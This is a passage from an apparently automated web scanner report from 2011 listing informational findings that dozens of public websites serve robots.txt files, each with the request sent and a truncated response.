Last-Modified: Mon, 28 Mar 2011 05:17:42 GMT
Accept-Ranges: bytes
Content-Length: 2779
Cache-Control: max-age=604800
Expires: Sat, 09 Apr 2011 13:39:42 GMT
Vary: Accept-Encoding
P3P: policyref="http://smallbusiness.intuit.com/small-business/privacy/index.jsp",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/plain

# The method used to exclude robots from a server is to create a file on the server
# which specifies an access policy for robots. This file must be accessible via
# HTTP on the local URL "/robots.t
...[SNIP]...
24.440. http://www.iobit.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iobit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iobit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:09:12 GMT
Server: Apache
Last-Modified: Mon, 08 Mar 2010 07:39:20 GMT
Accept-Ranges: bytes
Content-Length: 356
Connection: close
Content-Type: text/plain

# Robots.txt file from http://www.iobit.com
#
# All robots will spider the domain

User-agent: *
Disallow: /update_for_registered_customers.htm
Disallow: /thankTellothers.php
Disallow: /thankFeedback.
...[SNIP]...
24.441. http://www.ioffer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ioffer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ioffer.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:05 GMT
Server: PWS/1.7.1.5
X-Px: nc jfk-agg-n68 ( sjc-ag1-n2), nc sjc-ag1-n2 ( origin)
Cache-Control: private
Content-Type: text/plain
Last-Modified: Sat, 25 Apr 2009 21:36:20 GMT
Vary: Accept-Encoding
Connection: close
Set-Cookie: iOfferID=CgALKk2XJkVR2WeZAxrHAg==; expires=Tue, 30-Mar-21 13:36:05 GMT; domain=ioffer.com; path=/

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file

# NOTICE:
#
# All material on this server is Copyright (c) 1998-2006 iOffer Corp.
#
# A
...[SNIP]...
24.442. http://www.irs.gov/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.irs.gov
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.irs.gov

Response

HTTP/1.0 200 OK
Server: Oracle-iPlanet-Web-Server/7.0
P3P: policyref='/w3c/p3p.xml',CP='NON DSP COR CURa ADMa DEVa PSAa OUR DEL BUS STA'
Content-Type: text/plain
Last-Modified: Fri, 11 Feb 2011 07:20:27 GMT
Content-Length: 559
ETag: "22f-4d54e33b"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:35:31 GMT
Connection: close

User-agent: *
Disallow: /app/cgi-bin
Disallow: /app/comments
Disallow: /app/eprovidersearch
Disallow: /app/officeLocator
Disallow: /app/pickProvider
Disallow: /app/survey
Disallow: /app2/cgi-bin1
Disa
...[SNIP]...
24.443. http://www.issuu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.issuu.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.issuu.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:43:54 GMT
Content-Type: text/plain
Content-Length: 306
Last-Modified: Fri, 18 Mar 2011 03:14:15 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /home/
Disallow: /mylibrary
Disallow: /user/settings
Disallow: /user/upload
Disallow: /sections
Disallow: /signup
Disallow: /business/signup
Disallow: /embed/guide
Disallow: /p
...[SNIP]...
24.444. http://www.istockphoto.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.istockphoto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.istockphoto.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 17 Feb 2011 22:03:53 GMT
ETag: "2b312b-41a-49c8192b6a440"
X-Cnection: close
Content-Type: text/plain
Date: Sat, 02 Apr 2011 14:16:11 GMT
Content-Length: 1050
Connection: close

User-agent: *
Disallow: /css/
Disallow: /static/css/
Disallow: /js/
Disallow: /static/js/
Disallow: /images/
Disallow: /static/images/

Allow: /webservices/feeds
Disallow: /we
...[SNIP]...
24.445. http://www.iwin.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.iwin.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.iwin.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 07:58:21 GMT
ETag: W/"439-1296818118000"
Last-Modified: Fri, 04 Feb 2011 11:15:18 GMT
Content-Type: text/plain
Server: Apache
Content-Length: 439
Date: Sat, 02 Apr 2011 13:42:08 GMT
X-Varnish: 931872689 930451207
Age: 20627
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /ec/
Disallow: /Login.do
Disallow: /standardRegister.do
Disallow: /Register.do
Disallow: /*m=25
Disallow: /*init=
Disallow: /downloadSearch.do
Disallow: /index
Disallo
...[SNIP]...
24.446. http://www.jcpenney.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jcpenney.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jcpenney.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "98b0fd3b8465fae6fe0f3717d7de30ea:1292463674"
Last-Modified: Thu, 16 Dec 2010 01:40:42 GMT
Accept-Ranges: bytes
Content-Length: 101403
Content-Type: text/plain
Date: Sat, 02 Apr 2011 12:44:13 GMT
Connection: close

# updated 2010-12-15

User-agent: *
Disallow: /17offer/
Disallow: /274swim/
Disallow: /286dockers/
Disallow: /298apparel/
Disallow: /298team/
Disallow: /308levis/
Disallow: /429.2test/
Disal
...[SNIP]...
24.447. http://www.jcwhitney.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jcwhitney.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jcwhitney.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 26 Jan 2011 07:14:40 GMT
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 13:52:00 GMT
Content-Length: 1254
Connection: close

User-agent: *

Disallow: /*sku=*
Disallow: /*shopid=*
Disallow: /*nval=*
Disallow: /*Ntt=*
Disallow: /*Ntk=*
Disallow: /*Ntx=*
Disallow: /*Dx=*
Disallow: /*aid=*
Disallow: /*tid=*
Disallow:
...[SNIP]...
24.448. http://www.jihadwatch.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jihadwatch.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jihadwatch.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:43 GMT
Server: Apache/2.2.14
Last-Modified: Sat, 19 Sep 2009 21:30:40 GMT
ETag: "f248d-46-473f4f5ce6000"
Accept-Ranges: bytes
Content-Length: 70
Connection: close
Content-Type: text/plain

User-agent: *
Sitemap: http://www.jihadwatch.org/sitemap.xml
Allow: /
24.449. http://www.joann.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.joann.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.joann.com

Response

HTTP/1.0 200 OK
Set-Cookie: ACE_COOKIE=R3413708039; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Date: Sat, 02 Apr 2011 13:42:37 GMT
Set-Cookie: ACE_COOKIE=R1260875148; path=/; expires=Sun, 03-Apr-2011 13:43:27 GMT
Server: Apache
Last-Modified: Fri, 09 Jul 2010 14:27:06 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Content-Length: 327

User-agent: *

Sitemap: http://www.joann.com/sitemap-index.xml

Disallow: /images/
Disallow: /joann/search/
Disallow: /joann/cart/
Disallow: /joann/crypto/
Disallow: /joann/email/
Disall
...[SNIP]...
24.450. http://www.job.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.job.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.job.com

Response

HTTP/1.1 200 OK
Content-Length: 956
Content-Type: text/plain
Content-Location: http://www.job.com/robots.txt
Last-Modified: Thu, 07 Jan 2010 16:53:06 GMT
Accept-Ranges: bytes
ETag: "22da4ce2b98fca1:10c6"
Server: Microsoft-IIS/6.0
P3P: CP="DSP CAO CUR ADM DEV TAI PSA PSD IVDi IVAi CONi OUR UNRi BUS NAV COM INT ONL PHY DEM UNI"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:38:07 GMT
Connection: close

# robots.txt 4 job.com /// admin @ job.com
# /// I_LOVE_SPAM@127.0.0.1 /// bite this spammers ///
User-agent: *
#.....Disallow: 21*
## ////////////// ##
## May 27, 2005 ##
## ////////////// ##
...[SNIP]...
24.451. http://www.jobsonline.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jobsonline.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jobsonline.net

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:45:42 GMT
Server: Apache/2.2.11 (Fedora)
Last-Modified: Tue, 17 Mar 2009 16:49:45 GMT
ETag: "1178052-170-465535aafbc40"
Accept-Ranges: bytes
Content-Length: 368
Connection: close
Content-Type: text/plain; charset=UTF-8

# jobsonline.net

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Allow: /
Disallow: /browse/index.html
Disallow: /jobs/index.html
Disallow: /misc/cookie_warning
Disallow: /misc/logout
Disa
...[SNIP]...
24.452. http://www.jstor.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jstor.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jstor.org

Response

HTTP/1.0 200 OK
Set-Cookie: TENACIOUS=R1785643775; path=/
Server: AtyponWS/7.2
Cache-Control: no-cache
Pragma: no-cache
X-Webstats-RespID: c8cdb6634ea3e740e507d557386a55a4
Set-Cookie: SERVER=192.168.52.104:6085; path=/
Set-Cookie: SERVER=192.168.52.104:6085; domain=.www.jstor.org; path=/
Set-Cookie: JSESSIONID=babdbc9haXIcHS7L-PhgI; domain=.www.jstor.org; path=/
Set-Cookie: JSESSIONID=babdbc9haXIcHS7L-PhgI; path=/
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:05:27 GMT

User-agent: *
Disallow: /
24.453. http://www.jtv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jtv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.jtv.com

Response

HTTP/1.0 200 OK
Server: Demandware eCommerce Server
Last-Modified: Thu, 31 Mar 2011 17:58:19 GMT
Content-Type: text/plain
Cache-Control: max-age=25342
Expires: Sat, 02 Apr 2011 21:22:14 GMT
Date: Sat, 02 Apr 2011 14:19:52 GMT
Content-Length: 71
Connection: close

User-agent: *
Disallow:
Sitemap: http://www.jtv.com/sitemap_index.xml
24.454. http://www.justanswer.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justanswer.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.justanswer.com

Response

HTTP/1.0 200 OK
Cache-Control: private
Pragma: no-cache
Content-Type: text/html
Expires: Sat, 02 Apr 2011 13:25:43 GMT
ETag:
Server: Microsoft-IIS/7.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:26:43 GMT
Content-Length: 1288
Connection: close
Set-Cookie: ARPT=JLPWYQS192.168.1.42CKMQK; path=/

Crawl-delay: 10
# Directories
Disallow: /includes/
Disallow: /misc/
Disallow: /modules/
Disallow: /profiles/
Disallow: /scripts/
Disallow: /sites/
Disallow: /themes/
# Files
Disallow: /CHANG
...[SNIP]...
24.455. http://www.justin.tv/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justin.tv
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.justin.tv

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/plain
Last-Modified: Fri, 01 Apr 2011 23:54:55 GMT
Date: Sat, 02 Apr 2011 13:33:28 GMT
Content-Length: 351
Connection: close

# See http://www.robotstxt.org/wc/norobots.html for documentation on how to use the robots.txt file
Sitemap: http://www.justin.tv/sitemaps/index.xml

User-Agent: *
Disallow: /sharing/
Disallow: /*/vid
...[SNIP]...
24.456. http://www.justluxe.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.justluxe.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.justluxe.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:45:49 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 11 Nov 2010 22:45:06 GMT
ETag: "26401e-b7-494ceb9aae080"
Accept-Ranges: bytes
Content-Length: 183
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /reports/
Disallow: /includes/
Disallow: /modules/
Disallow: /oasjs/
Disallow: /phpThumb/
Disallow: /twatch/
Disallow: /terms/
Disallow: /newsletter/
24.457. http://www.kaboodle.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaboodle.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaboodle.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: ss=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ss=""; Path=/
Set-Cookie: pp=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pp=%00tB%00f0%3A253%3B1%3A253%3B2%3A253%3B3%3A127%3B; Expires=Mon, 01-Apr-2013 13:30:56 GMT; Path=/
Set-Cookie: pl=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: pl=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: sd=%7B%22mv%22%3A%22880%22%7D; Path=/
Set-Cookie: vas=""; Domain=kaboodle.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: vas=""; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: JSESSIONID=B295363930ADD027645A7F99B88EC5F4; Path=/
Cache-Control: no-store
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: text/plain;charset=ISO-8859-1
Content-Language: en-US
Content-Length: 719
Date: Sat, 02 Apr 2011 13:30:56 GMT
Connection: close

User-agent: Sosospider
Disallow: /
User-agent: Tailrank
Disallow: /pg
User-agent: *
Disallow: /za/search
Disallow: /za/editprofile
Disallow: /za/addpage
Disallow: /za/pagebadge
Disallow: /za/browse
Di
...[SNIP]...
24.458. http://www.kaboose.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaboose.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaboose.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:44 GMT
Server: Apache/2.2.11 (Unix) DAV/2 PHP/4.4.9
Last-Modified: Thu, 12 Aug 2010 19:11:23 GMT
ETag: "1c4605-a3-48da521cc4cc0"
Accept-Ranges: bytes
Content-Length: 163
Keep-Alive: timeout=5, max=90
Connection: close
Content-Type: text/plain
X-UA-COMPATIBLE: IE=EmulateIE7

User-agent: *
Disallow: /ads/
Disallow: /cgi/
Disallow: /cgi-bin/
Disallow: /familytravel/travelRedirect.php
Disallow: /include/
Disallow: /php/
Disallow: /akamai
24.459. http://www.kaspersky.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kaspersky.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kaspersky.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:56:17 GMT
Content-Type: text/plain; charset=iso-8859-1
Connection: close
Vary: Accept-Encoding
X-Showed: kaspen:kav:kavxrub=207716678
P3P: CP="IDC DSP COR LAW CUR DEV TAIo PSA PSD IVDi CONi OUR DEL IND PUR NAV OTC", policyref="/w3c/p3p.xml"
Set-Cookie: uid=AAAAA02XKwGv+6cfDs/7Ag==; path=/


User-agent: *
Disallow:
24.460. http://www.kayak.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kayak.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kayak.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Thu, 31 Mar 2011 00:07:03 GMT
Content-Type: text/plain; charset=UTF-8
Vary: Host
Date: Sat, 02 Apr 2011 13:34:54 GMT
Content-Length: 887
Connection: close
Set-Cookie: Apache=rcHW8w-AAABLxZsaog-00-LJhFbQ; path=/; expires=Fri, 27-Dec-13 13:34:54 GMT; domain=.kayak.com

# $Id: robots.txt.kayak.prod,v 1.23 2010-12-07 18:28:50 jleve Exp $
# $Source: /disk2/v/cvs-backup/nucleus/ui/kayak/robots.txt.kayak.prod,v $

# kayak.com robots.txt for production

User-agent: *
Disa
...[SNIP]...
24.461. http://www.kazaa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kazaa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kazaa.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:53 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 17 Mar 2011 05:44:59 GMT
ETag: "1579739-64-49ea729736cc0"
Accept-Ranges: bytes
Content-Length: 100
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

Sitemap: http://www.kazaa.com/system/sitemaps/sitemap_index.xml.gz
User-agent: *
Disallow: /search/
24.462. http://www.kbb.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kbb.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kbb.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=864000
Content-Type: text/plain
Last-Modified: Thu, 18 Feb 2010 23:34:04 GMT
Accept-Ranges: bytes
ETag: "0fe38dbf2b0ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:25:25 GMT
Connection: close
Content-Length: 3833
Set-Cookie: BIGipServerpool_kbb.com=1964053514.20480.0000; path=/

#9/23/2009 MM

User-Agent: *
Disallow: /javascript/
Disallow: /scripts/
Disallow: /*trid= # Used for PPC Tracking
Disallow: /*psid=
...[SNIP]...
24.463. http://www.kcom.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kcom.com
Path:   /

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kcom.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:00 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 24 Nov 2010 09:49:16 GMT
ETag: "38e04-1b-67021f00"
Accept-Ranges: bytes
Content-Length: 27
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Allow: /

24.464. http://www.kenexa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kenexa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kenexa.com

Response

HTTP/1.1 200 OK
Content-Length: 926
Content-Type: text/plain
Last-Modified: Fri, 04 Dec 2009 20:38:16 GMT
Accept-Ranges: bytes
ETag: "1ab4ddb42175ca1:3be"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:20:08 GMT
Connection: close

User-Agent: *
Allow: /

Disallow: /_cache/
Disallow: /_includes/
Disallow: /App_Browsers/
Disallow: /App_Code/
Disallow: /App_Data/
Disallow: /App_Themes/
Disallow: /App_WebReferences/
Disal
...[SNIP]...
24.465. http://www.killerstartups.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.killerstartups.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.killerstartups.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Sat, 02 Apr 2011 13:32:41 GMT
Content-Type: text/plain
Content-Length: 616
Last-Modified: Thu, 31 Mar 2011 19:02:47 GMT
Connection: close
Accept-Ranges: bytes

Sitemap: http://www.killerstartups.com/sitemap_index4.xml

User-agent: *
Disallow: /admin/
Disallow: /afs/
Disallow: /ajax/
Disallow: /badge/
Disallow: /cache/
Disallow: /css/
Disallow: /data/
Disallo
...[SNIP]...
24.466. http://www.king.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.king.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.king.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:55:45 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 09:12:11 GMT
Accept-Ranges: bytes
Content-Length: 260
Vary: Accept-Encoding
Link: </labels.rdf>; /="/"; rel="meta" type="application/rdf+xml"; title="ICRA labels";
Connection: close
Content-Type: text/plain

User-agent: msnbot
Disallow: /community/profile.jsp

User-agent: bingbot
Disallow: /community/profile.jsp

User-agent: Mediapartners-Google
Disallow:

User-agent: *
Disallow: /intermission.jsp
Disallo
...[SNIP]...
24.467. http://www.kmart.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kmart.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kmart.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "ebad46e1b6ab4eec860a2d63e9e19313:1285282266"
Last-Modified: Thu, 23 Sep 2010 22:51:06 GMT
Content-Type: text/plain
Cache-Control: max-age=580528
Expires: Sat, 09 Apr 2011 06:43:37 GMT
Date: Sat, 02 Apr 2011 13:28:09 GMT
Content-Length: 2450
Connection: close

# /robots.txt file for http://www.kmart.com
# Version 09/23/10

User-agent: *
Disallow: /*10175
Disallow: /*10154
Disallow: /*10153
#Gift Registry
Disallow: /shc/s/CallGiftRegistryAnnouncementFormView
...[SNIP]...
24.468. http://www.kodak.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kodak.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kodak.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:42:08 GMT
Content-Length: 6250
Connection: close

User-agent: Googlebot
Disallow:    whereiam.jhtml
User-agent: *

Disallow: *hse_support*
Disallow:    /cgi-bin/
Disallow:    /exit
Disallow:    /cache/
Disallow: *CID=*
Disallow: *UV=*
Disallo
...[SNIP]...
24.469. http://www.kodakgallery.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kodakgallery.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kodakgallery.com

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=0DBFD5CDC93E268FDE7706EA4F7B97D7.ecom403_main; Domain=kodakgallery.com; Path=/
Set-Cookie: sourceId=600019816903; Domain=kodakgallery.com; Expires=Mon, 02-May-2011 13:33:58 GMT; Path=/
Set-Cookie: sourceId=null; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: DYN_EMAIL=anon_mem1161408490@kodakgallery.com; Domain=kodakgallery.com; Path=/
Cache-Control: no-cache, no-store
Expires: -1
Content-Type: text/plain;charset=ISO-8859-1
Date: Sat, 02 Apr 2011 13:33:57 GMT
Connection: close
Server: ecom403

# Domain:[usgallery]
# KODAK Gallery
#
# This file should only reside in the kodakgallery.com/robots.txt
#
# Tells Scanning Robots Where They Are And Are Not Welcome
# User-agent: can also specify
...[SNIP]...
24.470. http://www.kraftrecipes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.kraftrecipes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.kraftrecipes.com

Response

HTTP/1.0 200 OK
Content-Length: 419
Content-Type: text/plain
Content-Location: http://www.kraftrecipes.com/robots.txt
Last-Modified: Mon, 25 Oct 2010 15:10:53 GMT
Accept-Ranges: bytes
ETag: "a23fe3d05674cb1:5897"
Server: Microsoft-IIS/6.0
MicrosoftSharePointTeamServices: 12.0.0.6510
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:23:47 GMT
Connection: close

User-agent: *
Disallow: /CMS_Templates/
Disallow: /community/recipe-exchange/UserRecipes*
Disallow: /Community/recipe-exchange/UserRecipes*
Disallow: /Recipes/RecipeBox*
Disallow: /xmlfiles/hero_
...[SNIP]...
24.471. http://www.krillion.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.krillion.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.krillion.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:59:23 GMT
ETag: "a04d-1c2-488a0cf113940"
Last-Modified: Wed, 09 Jun 2010 22:55:57 GMT
Server: Apache/2.2
Vary: Accept-Encoding
Content-Length: 450
Connection: Close


User-agent: Diffbot
Disallow: /

User-agent: Discobot
Disallow: /

User-agent: EnaBot
Disallow: /

User-agent: Exabot
Disallow: /

User-agent: LocalcomBot
Disallow: /

User-agent: MJ12bot
Disallow: /
...[SNIP]...
24.472. http://www.lanebryant.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.lanebryant.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lanebryant.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 15 Mar 2011 22:14:18 GMT
Accept-Ranges: bytes
Content-Length: 450
Content-Type: text/plain; charset=UTF-8
X-Pad: avoid browser bug
Date: Sat, 02 Apr 2011 13:30:59 GMT
Connection: close

# robots.txt for Charming Shoppes

User-agent: *
Disallow: /assets
Disallow: /admin
Disallow: /checkout
Disallow: /css
Disallow: /custserv
Disallow: /includes
Disallow: /js
Disallow: /manager
Disallow
...[SNIP]...
24.473. http://www.last.fm/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.last.fm
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.last.fm

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:33:02 GMT
Server: Apache/1.3.39 (Unix)
X-Proxy-Fix-Up: headers fixed up
Last-Modified: Wed, 10 Mar 2010 18:01:27 GMT
ETag: "21d9-179-4b97de77"
Accept-Ranges: bytes
Content-Length: 377
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /music?
Disallow: /widgets/radio?
Disallow: /show_ads.php

Disallow: /affiliate/
Disallow: /affiliate_redirect.php
Disallow: /affiliate_sendto.php
Disallow: /affiliatelink.php

...[SNIP]...
24.474. http://www.latimes.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.latimes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.latimes.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
ntCoent-length: 148
Content-Type: text/plain
P3P: policyref="http://www.latimes.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Tue, 01 Sep 2009 02:01:30 GMT
ETag: "94-4a9c807a"
